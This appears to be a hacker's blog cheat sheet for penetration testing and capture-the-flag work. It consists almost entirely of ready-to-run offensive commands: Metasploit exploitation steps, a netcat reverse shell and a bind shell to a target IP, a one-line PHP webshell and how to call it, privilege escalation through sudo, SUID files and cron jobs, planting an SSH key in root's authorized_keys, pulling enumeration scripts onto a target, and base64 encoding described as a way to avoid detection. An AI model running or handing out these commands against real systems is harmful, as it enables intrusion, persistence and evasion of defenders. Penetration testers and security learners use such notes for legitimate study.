pwnerguy

pwnerguy

Hacking, learning, repeating,
because the shell never sleeps.

Exploitation Cheat Sheet

Introduction

Welcome to the blog’s Exploitation Cheat Sheet! I will be actively updating it through commits as needed


Exploits

Public Exploits Description
searchsploit openssh 7.2 Search for public exploits for a web application. Try to search online too
searchsploit -m linux/remote/45233.py Get the PoC or exploit script
msfconsole MSF: Start the Metasploit Framework
search exploit eternalblue MSF: Search for public exploits in MSF
use [exploit] MSF: Start using an MSF module
show options MSF: Show required options for an MSF module
set RHOSTS 10.10.10.10
set LHOSTS eth0		 MSF: Set a value for an MSF module option
check MSF: Test if the target server is vulnerable (not supported in some exploits)
exploit MSF: Run the exploit on the target server.
https://swisskyrepo.github.io/PayloadsAllTheThings PayloadsAllTheThings
https://book.hacktricks.wiki/en/index.html HackTricks


Shells

Shells Description
nc -lvnp 4444 Start a nc listener, verbose mode, DNS resolution disabled in a local port
nc 10.10.10.10 4444 Connect to a bind shell started on the remote server
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/ Reverse shells cheat sheet.
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/ Bind shells cheat sheet.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.10.10 4444 >/tmp/f (reverse)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 |nc -lvp 4444 >/tmp/f (bind)		 Forward Shells
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 45 columns 184		 TTY upgrading
python -c 'import pty; pty.spawn("/bin/bash")' TTY upgrading (python)
echo "<?php system(\$_GET['cmd']);?>" > /var/www/html/shell.php Create a webshell php file
curl http://10.10.10.10/shell.php?cmd=id Execute a command on an uploaded webshell


Post-Exploitation

Post-Exploitation Description
PrivEsc  
./linpeas.sh Run linpeas script to enumerate remote server
./lse.sh Run lse script to enumerate remote server
sudo -l List available sudo privileges
sudo -u user /bin/echo pwned Run a command with sudo
sudo su - Switch to root user (if we have access to sudo su)
sudo su user - Switch to a user (if we have access to sudo su)
find / -perm -4000 -ls 2>/dev/null Find SUID binaries
ssh-keygen -f key Create a new SSH key
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys Once key.pub it’s in the system, add the generated public key to the user
ssh user@10.10.10.10 -i key SSH to the server with the generated private key
chmod 600 id_rsa
ssh user@10.10.10.10 -i id_rsa		 If you have read acces to the user’s SSH private key, copy it in a file, chmod it and ssh the server
crontab -l Cron jobs of my user
systemctl list-timers Time left to execute each job
/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root		 Write access to any of those files will allow us to to add new cron jobs. Also if we can write to a directory called by a cron job, we can write a reverse shell and it will be executed.
./pspy Analyze running cron jobs
getcap .r & 2>/dev/null Capabilities search in the system
https://gtfobins.org/ GTFOBins
https://lolbas-project.github.io/ LOLBAS
Transferring Files  
python3 -m http.server 4444 Start a local webserver
wget http://10.10.10.10:4444/linenum.sh Download a file on the remote server from our local machine
url http://10.10.10.10:4444/linenum.sh -o linenum.sh Download a file on the remote server from our local machine
scp linenum.sh user@10.10.10.10:/tmp/linenum.sh Transfer a file to the remote server with scp (requires SSH access with password)
base64 linenum.sh -w 0 Convert a file to base64, useful to avoid detection
echo f0VMR...SNIO...InmDwU | base64 -d > linenum.sh Convert a file from base64 back to its orig
md5sum shell Check the file’s md5sum to ensure it converted correctly